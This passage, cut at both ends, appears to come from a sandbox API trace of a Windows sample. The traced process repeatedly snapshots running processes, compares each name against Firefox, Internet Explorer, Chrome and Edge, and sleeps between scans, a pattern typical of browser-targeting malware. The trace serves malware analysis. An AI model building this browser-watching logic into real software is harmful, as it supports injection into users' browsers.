(lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.679] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.679] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0234.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0234.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0234.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.680] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0234.680] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0234.680] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0234.680] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.681] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.681] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.681] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.681] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.682] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0234.683] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0234.683] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0234.683] CloseHandle (hObject=0xd4) returned 1 [0234.683] Sleep (dwMilliseconds=0x3e8) [0235.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0235.719] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.720] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0235.720] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0235.720] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0235.720] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0235.720] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.720] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0235.720] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0235.720] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0235.721] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0235.721] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.721] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0235.721] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0235.721] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0235.721] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.721] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.722] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0235.722] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0235.722] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0235.722] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.722] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.722] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0235.722] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0235.722] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0235.722] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.722] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.723] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0235.723] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0235.723] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0235.723] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.723] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.723] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0235.723] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0235.723] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0235.723] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.723] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.724] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0235.724] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0235.724] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0235.724] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.724] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.724] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0235.724] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0235.724] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0235.725] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.725] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0235.725] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0235.725] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0235.725] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0235.725] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.725] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.726] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.726] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.726] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.727] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.727] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.727] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.728] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.728] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.728] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.728] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.728] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.728] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0235.728] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0235.728] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0235.728] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.728] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.729] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.729] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.729] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.729] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.729] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.729] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.730] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.730] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.730] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.730] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.730] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0235.730] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0235.730] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0235.730] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.730] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.731] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0235.731] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0235.731] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0235.731] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.731] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.731] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0235.731] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0235.731] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0235.731] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.731] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.732] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0235.732] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0235.732] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0235.732] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.732] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0235.732] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0235.732] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0235.732] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0235.732] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.732] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0235.733] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0235.733] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0235.733] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0235.733] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.733] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0235.733] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0235.733] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0235.733] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0235.733] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.734] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0235.734] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0235.734] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0235.734] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0235.734] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.734] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0235.735] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0235.735] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0235.735] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0235.735] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.735] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0235.735] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0235.735] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0235.735] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0235.735] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.735] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0235.736] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0235.736] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0235.736] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0235.736] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.736] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0235.736] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0235.736] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0235.736] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0235.736] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.736] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0235.737] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0235.737] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0235.737] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0235.737] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.737] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0235.737] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0235.737] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0235.737] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0235.737] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0235.737] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0235.738] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0235.738] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0235.738] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0235.738] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0235.738] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0235.738] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0235.739] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0235.739] lstrcmpiA (lpString1="ruby.exe", 